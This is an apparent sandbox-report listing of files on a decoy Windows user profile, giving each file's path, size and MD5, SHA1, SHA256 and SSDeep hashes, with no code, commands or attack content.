C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\O89VrUgck0WGUK_Y\g1B3M3.avi	92.32 KB	MD5: fedb48a3914425825b9d1b4c20b32f75 SHA1: 029f47447f579469a2a4dcc46ea19f2ff69e3986 SHA256: 34b1219c81d2470513d279929699b53b7c9629decf9209b0a951e630b28dd960 SSDeep: 1536:ymBjOL8tRyrAGPswu2M54muunGGPacb019r5kYGAdQO9WYpl:zjO4yAGPs72M54mUce56ACO9xj	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	0.13 KB	MD5: d9dac31e811d04eb99ccf1baf197380e SHA1: 21f6e20e0e6608ab702b3f38e307fd5ac81c01f1 SHA256: 6f3ee2bfe7e8973e882bc87d1fa579f66f0030447f26f1e1e4bfa85c4b53c7a8 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exO1r8+7s:afwSkeMRRkPDz58dz6vtkhy	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\VmQaguirc.mp3	41.57 KB	MD5: 880110920437c422909509dd47cfa7d4 SHA1: a27e340cebd03fb6b1001b83b0899a706bef9158 SHA256: e524ac385003b50ebe00f13ca06a4efd705128821f1a791013532ec91b73e9b5 SSDeep: 768:f6b26s4QMuWwlV6lprbmBZyeHwOvkEzySjHT79CqXw2t8WILYlo5vubVBz6:f6b21hMmVgwZymJxjFCqA2t8WILYYCr+	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\nvyg\pkWtVne.wav	18.28 KB	MD5: 5b56e7c482c5cf791e37b69a23e65b44 SHA1: e066f6af69e674e8c37a831e6d004e4585eef19a SHA256: fd1dd07f6c30232cb63a54a99b771aa70839639d37d354a63b49f8434c546fb3 SSDeep: 384:nKGNczUEFG1dtZzplwtV1U3jFO0jSIZ+nsU6pudsVTYavoIcEHpcOFi:KGNctITpGt3U3RBjSwosZpudQQIcEH+/	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\pplpY8py2zNIuuEmOh7.pptx	90.19 KB	MD5: 58a8b00a4b6c9ad2c79f080033995752 SHA1: 86a474f54583efcf8589382bb8ecab0c210cfcf1 SHA256: 31412f28eb5fe7a2939976f27a95d6847a77678074f6e61b5f472e3465ad5170 SSDeep: 1536:oHBa8LSYvly7PfqynN8sOzXH4/TxY/Sg6huLdjULgMLMyCv4TjeXj8XJzTI3dE+t:ezHvUfqJXYMSg6aCgMQNXj8XJzTIv4U	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\desktop.ini	0.08 KB	MD5: 427e8f6cb1f89e67f07072375ec15530 SHA1: 050f80144db2f09b8ed8bb03329af547986637af SHA256: ed5af0792e131570051f1c0515347ce841bc9f3e8204bf2887f527b62adb155c SSDeep: 3:sbgNoTKDUwCau9gy+uekfun:sEB/Cl9Fun	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	10.00 MB	MD5: 24bf4c01d1734547c879cff2aca3e05b SHA1: c12ed3bf5ed57ff57d73f689dfa8231147d475a0 SHA256: 161a33a080bb9a1153ceff2810d3c1a8d5e782e4a2d37d903f351da2e464d521 SSDeep: 196608:hpWdNm7l//upum9uxpfp4uZ8q7zEqaZswqLhQTcvlj9/z2H7DLKH8:Fl//upum9QtEqaeqc3/iH3mH8	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	41.50 KB	MD5: 71c6c61642e84e5f85e10935659a3300 SHA1: 6d5d6756e006bb6e78c0edaff4ae5d7972bab29f SHA256: 2abd76b8a7064154905aee12063e9ee01f16a77d088b5a6152157a68e3841738 SSDeep: 768:V4Y7MikXkcCjUQb4qiZesKi8aHoAzehkB5bHXnss0Dj09++pf:V4YVkajUy4qhsB8aHoAzehk77ssl9++x	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\xjB5_nJ6.flv	19.68 KB	MD5: 41972ad9ca88ce308ae510b64c4057eb SHA1: c1610253de71ce9f3e405b0a8ff0a446870bf355 SHA256: a34ec57362165e9105ab3bd1c3bf3a2c7541a5e9140ddd254953e3050044c5e4 SSDeep: 384:gBI/U0UXBrdDjye68rPbeF6iy4IRDGNyL8HIwvJC4gvrM5bi:GkU0CdNRP4y4wqALMvJDgvQti	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.INFOPATHEDITOR.14.1033.hxn	0.37 KB	MD5: 11c27f181606d672c230b6b53e6ea994 SHA1: 7b472d38b45fa2d34dd57f9133a00a1def86bb96 SHA256: b21a856445aaed1e7651fa6e82a93f7b0a3714c81e71df836a39f36daddee5da SSDeep: 6:gn9dH/0BLjFj2UAguHfniBBjHePVUbZXU5ImmfJvMSke2VwcVRTfxmzBMQ75ts0N:K9dHMBI6UiBBCPVU9k5cMSXzazxmz77l	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\wKKlBy5ZmIsI.flv	87.11 KB	MD5: f387df9d27cc59e9dc383d18d29650ca SHA1: b9d5524b259ed293114477e24f0ca59b6905a8eb SHA256: 2ae9c73b632d132541fa32a2550e736dbb757f399277082e93bfe0cedc60f8c6 SSDeep: 1536:gXisTAO1Nt2mNBXDvyb6MQUjZWCt5sHbUr6rJFfuk8DU67Rd0hdSpff+tECW:7sTPVv9UjZWkW7rrrf2n7R8dSpffEECW	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\desktop.ini	0.49 KB	MD5: 05c0e2fd98e1c027872e8d83d19f33bf SHA1: 7ded9a4a157b7c3f7dcdd8a7196427ad564053f8 SHA256: dba439916406e7161bfb73a79357414a3b17b2663263359acc2b7d2a5b7cf755 SSDeep: 12:ilZ9RF+tHms0ascmkNc0Le+qYG8e16Pc1q3NEWS+:il32hsZ0KAcs3WWx	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\ubh3Kx_A\rtYIqoqrRvq.bmp	21.14 KB	MD5: df4a9d02a9b40f03b3f86931ce8c3b82 SHA1: 3772333df43c120af578529bb16d48b018b70c26 SHA256: ae7400599a24ebf4c9c6b1f4dfb5e879745a973f53208649e609bf8831f13d06 SSDeep: 384:nndyzdAQcgygKFIgAEmtAVGkBu16Ozp6SeanMb8iUwVceB5YqBFnI3lVzUE/V:d7bT7IYm+gkk16SUacJTBAlVzdt	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	0.13 KB	MD5: 3f508c5552765c3342d4a749c119ac54 SHA1: 9b800fd0841412f38d4bda6a239c4fd4f547435e SHA256: 2114e05b7c43f1fab51dea98df10396a6ecc2d608f5c52813f543ecc380acf24 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exubr3Hs:afwSkeMRRkPDz58dz6vtkh4	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.MSPUB.14.1033.hxn	0.32 KB	MD5: fb508ca57d92db40bfb0e287cccdf911 SHA1: e81220439898b91af720702ba713fb18d71b0ac4 SHA256: d61b8541808bd1075e3dede7f1feed23e0b19a0d17433bb0e4d8a2a9dadb3ad6 SSDeep: 6:gnGi1KUNhFSoHMvV0xzNPn2JXq3K9fNIamKpCiGSOxje0IAZLcjEWHSFmOltPR2:K8wX7MvyxzNvm6aHIamKhYje0I8cAWH9	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\FN7 jccu.png	36.77 KB	MD5: d15e925370eba5f5d4f1573fda47c44a SHA1: edd754cd69ed0d238d98b07a420a452f8a4cb8d3 SHA256: 483583b38cd445fec89c8d60c641bc006ed1e71ae7a0269647e1e4b64c8454c3 SSDeep: 768:LVW+DNcl1j34vu8B4U1iCreAryzpFqpiEfaSmA1t4wDB78P1UUVXiw:Lot3uuY1igry7qpiymA8EOFiw	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.VISIO.SHAPESHEET.14.1033.hxn	0.38 KB	MD5: 65d57120fa4eff4cdcf8411cd3386aa3 SHA1: 0a2a553ce16a6d31400feeb75acad6155125e1fd SHA256: 610aa9aea0ab25ea3bb8b40eddda84ad955e354c0ba0887eb1cde8db9b169e37 SSDeep: 12:KxdRza59ACJxB+vLqjtBomu6SqJLYE+gpCOn:Kxds0LmtBomuhqJLYEOOn	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.WINPROJ.14.1033.hxn	0.33 KB	MD5: 9251c4899da1873f70b72fb967c9effb SHA1: fc39595428ad91702183bce0ed28bf702a780a74 SHA256: 80aa76e90c4e6693704da73bf7f39f26ba9d8427fdab74c6f78f93d2b7e26207 SSDeep: 6:gnl88unJJThY9+xKpbZq6SmGj7fdiGIdzjAz9Fz9zPk2n+8vNpSKbkm:Ky8eW/p5Gj71iGI50xJ9zc2nzvNpJB	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.WINWORD.DEV.14.1033.hxn	0.35 KB	MD5: fa4103567a27e3f5146c15d9caea3615 SHA1: 29b234922e2f18e0b74f18d28bb7b3940d1cb401 SHA256: 82e021f60e52df8afb915c7cc68e872a95fdf850ad2ec2c5bf467a838fc6450e SSDeep: 6:gnjBVhy29UC0qEADtpJ6K7pD+ZifNHZnHjNQseFu0+VQ+DypUqwi92y1MeUqd1:KPhy0UC0qEmtpndiIFV2sezB+DJbi9VD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\fWq7Sf.m4a	2.28 KB	MD5: 2a4a79a06cbdd90e617b7e16068eda07 SHA1: e9126b3b585d288782ad2291c5c556ef2eeb9cbf SHA256: 95b362268262563fc99575f59507b487af7a0957077b10f2fb8297e33f3bf703 SSDeep: 48:zC2+NdSA+azaTohn2IXVy3MsIL2Ni7UpkQhPIGphT/mEO9/jDtiWkr:zQNQLazl/sIS7kO9hTVO9/j51E	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Hy6vDgJFghnTAj77.xlsx	10.61 KB	MD5: 41903efd1c809883e4fbf16d56b7d0e3 SHA1: 8dbcb70740275754402f630a7862333b85a800f7 SHA256: d30fb392accea894cd0a2de376cd3d31f63383218f7c9568a1bea6c27344719d SSDeep: 192:651eKd9HTyJuu+nu8EYLxCnaBeFLITdPAs+LY6dOEl18flFzyWdwa0YCosUKFag:651eK/HWJuu+tEYLxBB80TdPAsYddv8O	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-bVmT_XCtJmzFCE.png	47.14 KB	MD5: b383ac65b9d25af49866b1999803d00b SHA1: 7a0bf335dd60d0d21df6b0c30e471f1021ce7755 SHA256: ccbe28f6223a3fa50a5c6bb49c9a4d0da7ba27f3433e4c4ed4763ea4e67ea883 SSDeep: 768:vxvpip8WcyxL2Vnp1qT3MoVLNopAemlPqKTJBg5RNxmdfitwkf4Pq3wLQR1McgmM:681DK3lLqmemQKTnCvxmQWNPq/1McgmM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\hT-SqtZX\obgiME5jO2.docx	50.46 KB	MD5: 297d88ff64464316701c8be5668c7095 SHA1: 2d50f6614c526aad3e584b42fb3a6c6e80bdfcee SHA256: c216b8414bf2efce6768752d1ab70fafb7e72d8aa12bf707fb8d60a61a687f1a SSDeep: 1536:LCJiK8CC1QsQJ8XrkyrmtP9ZFX7jtjD+e:9VXrkyri9DLjtL	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\B-lTUwZlpVSP7x8c.gif	64.28 KB	MD5: da3aca7f020e13c27d9747245931cb86 SHA1: 05eddb51a914efd53a2e187c662dd4ad317c4a30 SHA256: 217eb986399667164f03b62cbc938b1c1aec2c5cf0dcaf709ae76f32ee7f0b77 SSDeep: 1536:6dEY2WCB2B9XD1HKSk/nD7z23vKW3MVP7PnGtaiQ:6iJmXD1mQvKW8R7PnGtaiQ	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\-3gHp4i8DBQd4Fi.pptx	85.22 KB	MD5: c2dc2367423e286dcd521610fbc982e5 SHA1: 9098d365199c21589baf32757408c1cb9916b1c4 SHA256: a22e1f81555e58dd4b608379b2f4c3b0ae9813f9c4561ac874bab95114cde97a SSDeep: 1536:oMV6RcFyDBDEvO3OzZfMIfRZKt49jXyxwFY7UZ9ZDSZ/cScT2r/CAxqJq6f+f2U:F8RmABDEvO+Z5Zf94sY7UZb+/2T2DCA7	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\cc0AC KvAZVVI8uX.gif	30.29 KB	MD5: 1ebafec902eed504a7cfb6721c669056 SHA1: 8c4f273e56d19275a879a92077ba6fd2baccdd97 SHA256: a2bef4f75457eceb17de55ae950e4f61c445efbf54f4d70b8c4493ed9441da2e SSDeep: 768:5AW9DmZQSsFFFf2JkZcCUXuBARUi6NPu8BztB6l:+W8ipZc/XuBACix8BJB6l	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GkFwBZ26Jl.docx	7.29 KB	MD5: 6d93782ee9978fdcac19d92f830d200d SHA1: 406a051b7d48259cb61c5e48e3cd6c8f810c7eaf SHA256: c30dac4f9a42c2b6405d25d34a0a0ad7547cebd0d29ad2468ca32bcd34d93fdd SSDeep: 192:L5WMABylzncxrURkDxON385Vp9T+6M+B8FgV:L5WMAYVIwRkp5RaD+Is	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\kuUk4.swf	74.14 KB	MD5: 728cb8a1d93817fea702465b1f8c9a86 SHA1: fcae8735a5974615b721b363a8f990f1f5fb2bad SHA256: 9149fc0022e51388353b7db461f541a8b5837c1955f0993d9f347a0548d9d2b3 SSDeep: 1536:duy5B3Jccvzoi1bFFrCeJwio+TCin7PVI/KMmD/u40Y74Do26Qghb/f38mCv:8yxs0bj3Jw+PV+Wu402ucD38mM	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	181.00 KB	MD5: 49a86c0ed098ae60dfa66c5b959bc3b6 SHA1: 12c31e174cb0f17205b1080fe8c0c8f07aa5bee5 SHA256: ffd0cea8ebd7e55200ef906edabb8976a83fa22fabb533a4c86317262802895b SSDeep: 3072:deAoIoh1PP9XFTZDgAbL6qr+VnrtBowm02haKGDBmjJBKzAD3FaOuBlTvo54Kms1:cAvoh1Pp0xrtBINWBmjJB7FaOuBlTw5r	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\YzRpjUWu6VDm3TLDV.pptx	50.41 KB	MD5: 85e3b48c4eb5f104c634675842f1a99c SHA1: cb047a7a82213c3b252cde5fd4a81a0e7467a2c0 SHA256: db31e9475e7576ef9517e1c6e8c2de9c534a12f2230607b585ade4dc2dbbf47b SSDeep: 1536:oB2JabNS8u+1bnJ+5Iba55QJX7Mus+z+hkwqiAY2DCAj:82J6N9X1bn4IbL1s9hrqHDCAj	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\skaVx\aI-hq-hLGIh9RDS.xls	91.83 KB	MD5: fbfc4dab413a58ae90139411ba25468f SHA1: 4a2b155668e6626e6d9d6ecdb56facc5e46f4859 SHA256: ddf4ce8d607b526954aa89bb363a7b3334373de6421f16d4e955dfb8523942d5 SSDeep: 1536:D5VvuZxqmJ/nnc6c7s0aLjSAn2EPUiW8CY3TeXJZsWG4LbKzrsShwpWC5S:lVWZxqK/c3dayAoiDC2eXzNMMSCdS	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\CrDx78k.mkv	80.92 KB	MD5: c5c12d7e2aa948d13ee6169a32cc3039 SHA1: 8f2d344c72da2a0d124274f8f763be6020115758 SHA256: 0c805eeea776413dfffd0e8a030c91bca7cf8974fc1f1ad9ad82e9997680df62 SSDeep: 1536:ukI7/ROOCpIuXG/5jBnOJlZL+3fmMrLdpxzRVusCICHUVjQ3kZaMAzhmt:vgROOCphXG/9BI5MVPzRVuNBHakvMAze	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\v7CbnDwOOLwRsSR.xlsx	2.08 KB	MD5: 652580ed29f9410bf70682557851870c SHA1: 640de85cf1593f968a8f8bfa9b5914ec319c1179 SHA256: adc65ba9ff3316d2b4f7e72035f7b6baa2f4491fedfc30211c9ee52c1ed31919 SSDeep: 48:6UzmvFACTXmEWN+c1PfYes1a7ynXi6XXJ3N9g6aS:6UzEuIWEQ+2nVs1aeiqhh	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\laJ7 XG6mvY9a4Oq.mp4	46.41 KB	MD5: 2230b222113558c2396c9f892fb34813 SHA1: f820f883b27ac32bd0c2e8e65b1fba518f66fc9c SHA256: ed92faf2d38435b6649bdb10e0c788decebf59f925f795a3c3fda30a42be1738 SSDeep: 768:z+clsVlP8WahWbFMVAPFHePzZorbN/+DvJGhzWxxDqA7qXEIF5HScP0:zRsVlP8dYbFMVAd+bGx+1GegE+5yL	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\QVNDMBKO6iJXOO2h3\LcNIbb5Xdpy1cT0Voq.flv	60.32 KB	MD5: 7173acbd08f95d2b2b0298c100ea8271 SHA1: 28420cff594bc55df7d36d7e3c35b5db88c7bc80 SHA256: 7cb226702e4f3abb2e61dcbfed7d1542d4dc0e0a10f7c78c6b6d80b32c811eb3 SSDeep: 768:DXmX0m13Kb/4KgaQsa9jqGEg9nLXi30BhRO8egLQP4ABCKxMOeRguvANGOz6wbLV:T0DcEKFQsIjYmnLSEB51XYYdvADzlemJ	... File Actions Show Properties Download
C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdbeRdrUpd10110_MUI.msp	10.00 MB	MD5: 493d0abc21f77c01c73e8e65bf6ca6e8 SHA1: 5bbe66e6b92a48948a78a25ace875c2394c067ae SHA256: 62562987168930eb3a3d131ddc343910c0ea2221bdb6a46860aa1dc7c675ec89 SSDeep: 196608:0n680fUIyyPHgvDXadSLsS8nQsiAESOsYnwZrja9segf:0ndkUaovsItAqpnevIu	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	0.13 KB	MD5: 0968f6bba2ef99cea85be449cca4613c SHA1: b951eb79543439aa49d73eb27a7f17f6b64983e3 SHA256: 54b646ed7ed60e410d779fea59411ce2affdeb1d4c91235d8011d0c6c14dbe30 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub+TnHs:afwSkeMRRkPDz58dz6vtkhGY	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\n7JpqV\8ctUF06 2SC36xX7cR0\4DWhN6RhpgdCQKemK.gif	6.47 KB	MD5: a285241789dfab34520126dc722c18ea SHA1: 62dfd9e5925a717c7694b7543e3b68f2f8d00ca0 SHA256: 17cb7c540c219508415cd0ea5a98981e8db1310a2beafdad4a87f69a68013667 SSDeep: 192:/pAk29Qgb7d1/Il8DmdPzN6r63eYwoRZcpFPe:7Zgvd1/IWCdrN6u3RFRmvPe	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	0.13 KB	MD5: 5dc6e3b7f639899d29b173e41710326a SHA1: e6e901c81425d539473a9238fe47befc29834a34 SHA256: 2beaca35fcd496ce6b48016677fbcc97622067ab8b4694833700fa9ebac71d76 SSDeep: 3:afwSkqOCAPkOfaO7dvjYPDz58Q0xz6vtkdzN9exub0UQ7Ks:afwSkeMRRkPDz58dz6vtkhKd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\ni0Jgy12uVbTOlRR.mkv	3.49 KB	MD5: 277ceb669acaa0c932ec66d476a6c649 SHA1: 7af0a6b8708feeac73df39277d39c11be4ca05cf SHA256: 4e525e1171c99e4293130a389ecbb01ba1a626e56ed591c2d6cecee6d5dbc04a SSDeep: 96:wapFuCySjWOhM/zJb0B/I5Ng1Ks3AIWu27Gm/PQcxw:P+OaN6Ivg53AHuAPQca	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Links\desktop.ini	0.57 KB	MD5: 9a13388d39edf84eec1b5d5af41f96b1 SHA1: 5b00ae3fbdc0c32de83c3ce2a1493a70cdd3cebf SHA256: 6bbe6d1f1cb399732f360661c658fee6bf0ffd0aec7934918d5948345b97b897 SSDeep: 12:ilZ9RF+tHms0astiM9uG8X09MbQggUC5+u5f2K/YfMsSyY9rAYwFtiljA7ey:il32hsaTXdDmku9GfSyY9rFwFtL7R	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\y1mkaun.wav	42.47 KB	MD5: f6e8eff2b3c0a6bbe6533439a6c0b9b3 SHA1: ec215162b5f78d7d10f7ad6dfc56495b6f9396dc SHA256: faf1f771f3391747b951e80146bf2544990c053d2d33a77de5f53359e582bb65 SSDeep: 768:5vhF+eyQw1JhBGE9xawosPvN4CBg+4ICt+7ogT5zazjEnnHT0tX2txyL:5vhgQwxBDxawLPvN4XRHwogT5zwEngtH	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	66.78 KB	MD5: d322e6d604c9d3e06c8173e70b7841e4 SHA1: 165f3a8f91302369343713d6d4a0f53cc6afc124 SHA256: 77c6b6b39759379ec9c49d99f93973a256274e11e44652a7b3ea73b31d1edd2c SSDeep: 1536:yFSYM6nag0DTjuQx91wJIQvkbY4SVykUPRhd2YXNDAT5ya5op:yUYbfCTjB1wJIqVo7d2YX1ayaa	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	885.50 KB	MD5: 5e14fb212c9979fc3e4d07851dd2840b SHA1: ebc4c334102756ebbf760b7edf235eef2eb90314 SHA256: a8943a3d00f91a7d4d5db49d8987503126546fc6b27196f6af01dd2219424fba SSDeep: 6144:NXkD5gFG9dKsduN2sCWctvCQ0OGj2QELvMYI2q3ksedyPs3ETGpyIQEkmt3PNXM1:N0DOgduPFcZCQ0OnikseAPsJpfjt3PE	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\SNwh\3-Cn.ods	12.73 KB	MD5: 614de1af37a3e3ac5b4e9078aea20d9d SHA1: 2dcf544e68074e954bce8db7ffba8ed6b8b5c1e2 SHA256: 5bcefe145b62b78676af1014ed422a8e844164b76dee29d04be6cf20e3f4e0e6 SSDeep: 384:D7YNAGgSQu7pJ5MLPkm/mXHoPrPiW76WmER+E:/YoSQuFAsm/oIPrP9Nm2P	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ztTnKYuZ\f 1Medb.mp4	93.59 KB	MD5: e479304ef879519247b6b0fe6a93b7e8 SHA1: 12f06586ed3cf077b9efccbbfbeafc7eb6b244e4 SHA256: 0f32b176276954afd82673230fd1411264c9da08547c7cac260c63d1a254173a SSDeep: 1536:9aJzi19mG5iwcFpnsg2Le182jhtU8W31uPUu2xcPDT5EYYNZAJHSV:9ag9m9V3sg382j48/2uPDT5ViAJyV	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Music\rXoVxt3oiS\O5g4jLerSHDy3Pf8Z8r\_Xt1XKuQQyohA.wav	56.10 KB	MD5: a6f0df8e140dfd3ee68f4f744d3162c2 SHA1: 93dbfbc023c0745314ed4ecde3b7e1670365ebb5 SHA256: c83b89fd7d3bdf3d1fc06253ab714b07baf1e3554929870937dadf5d04f7e1e3 SSDeep: 1536:6QnGbs4SFkdYf/mDFKYGxSlZLRP6ymJmV/cpswDpId:X1Oif/mRgkZLRLDaRi	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kDhx0.ods	52.15 KB	MD5: f59309c2d20ac22b11c106fd2d4e35fc SHA1: 3a621f217aac3ba4ceb3bac258ae671e294f5bd3 SHA256: 07646c7c67c4071ffbf0659de98640afe5ce7ba278007c17cd4c2c807e599491 SSDeep: 1536:DjOGsXdpcrrmR3TBpAODDhcIRmEcrNzyurr1:DPr8cyFirRhrh	... File Actions Show Properties Download
C:\ProgramData\Mozilla\logs\maintenanceservice-install.log	0.16 KB	MD5: e5033f8478a1a2c442362efce2d2e52d SHA1: ddc3da0f732d030aa1b3a8fedd202a1e9e9636d2 SHA256: 37dc58ad9f37062a700599d815a9f1ca2514354104a8244bb44ac12a4cb0e9c0 SSDeep: 3:ZWxgyb+0V9XMrHD+t4iI9m7OluCQFDDz6iRD23FoDbv9An:4bPaHmvxKlNqDDz6ic3FeD9An	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	1.15 KB	MD5: ae8ff95e1dca3ffa22d4f443ceb19453 SHA1: e42a68ce7d3c0ca08b7fc57d3027e5f9f06a93d0 SHA256: dd271d93d515f1649d5ad891e67cbf29808b08ffb62040287b79fc1d5f8ed82c SSDeep: 24:ILozN0UmhL6Kusu9lsBMcvfRpr+M2db0Wb2LzbxOdgpQ1K:IgLkCXsBLpMAWaLHDuK	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c30-G7I4Ib7Y-VxrTcg6\yqgAGD0mq69zIZ\Dkb64er\hs9eu0cg_VHy7\FIhr5H47kz.pptx	56.99 KB	MD5: 32de629b63eb7cf8678f3d8d6178f735 SHA1: b408f4e9a79f03d9ae07afe8c8dbe2e96e1a1571 SHA256: 2c728e1750ba1fc63c51cddd188615cfe7f9de8d7a07e59b6b68cc8e3548a4fe SSDeep: 1536:oqDc7/Bt3RwPMa2coxki6G+hdYEjJ+gdNwe:ZDc7/dMTncki4hCEjJLD	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\zu1 _on\QaUjhe\7FDM.jpg	98.77 KB	MD5: 4b5905695813ae52f8d3bff26fb6c353 SHA1: adce055c8f142396487cf1d1884765c9a1f1e736 SHA256: e9e2cf558995d4a897c7fd27bbd6576493225dbb54cba6f55994ec7a34dc9739 SSDeep: 1536:pEnhu3XQibXr5TOv41Brvffturuvj7bPxxi+dXhFkKvO+kU6sosh9FRUT61ZO+MC:ptXBTOWJbfiaXhmKvONUxKTWK43N	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\OaJupVjMV.mkv	57.22 KB	MD5: ee5e2ab500d2caaae449a578bb34be38 SHA1: 60ddf8864423e2f8614a5707ddeed17ed70b9e68 SHA256: 6c064fb55cb4d542030169e6c3ffcaee8af9f7445b27df8f6a088a6804cb9d81 SSDeep: 1536:32zxMbGsK9vu28dZx/QkpnsZoJlvWDloS5yPdpoy4:3MqGsKdSx/NpwYvWDloSIP54	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	265.00 KB	MD5: 07250040883684ea3a6a673a554f07af SHA1: 3c7e633884f61753d081a72c6cb0250aa877489b SHA256: e729b421005415e34b134277262f731bad7dd9c67ba09d71f729c9a7810abef2 SSDeep: 3072:8WJWeFD2G8ILL67JF7orRo1IwBIeXSg1dfGKn3Gqa1ZH+p2I7dxz+tET:XS5FFUr+1IgXSEbGqa1ZGz+	... File Actions Show Properties Download
C:\ProgramData\Microsoft Help\MS.EXCEL.14.1033.hxn	0.32 KB	MD5: 74c20505ae2b8fa9539dc1d2f6695928 SHA1: f5e72ece1641afeaca2d12215be55132bc85acbe SHA256: 3f190d5dc52134563494f960d69463197e53f0d338649722b036f401d82174ad SSDeep: 6:gnGbRY5SoynAMvV0xzNPn2JXq3K9fNIamKpCiGSOxje0IAZLcjEWHSFmOltPR2:KcRuyAMvyxzNvm6aHIamKhYje0I8cAWd	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\EXInUgGRa8IXEf\rRaXTMp.mkv	82.47 KB	MD5: ee04047116edbe1108bd0d8613b00499 SHA1: 1f210a8836a6760db347cdc0f6d6efed6b4fb534 SHA256: 25120f747c8607dcf9c186273c8073482d3fc04e20592d1244492a51ab5b300d SSDeep: 1536:uCGsgX14atVUOJPKOyXXf9lt7j6OpKPDaPUwoVZrewx2q2q:uUgaatVJJPk+OpKPDaPUxZLx2qV	... File Actions Show Properties Download
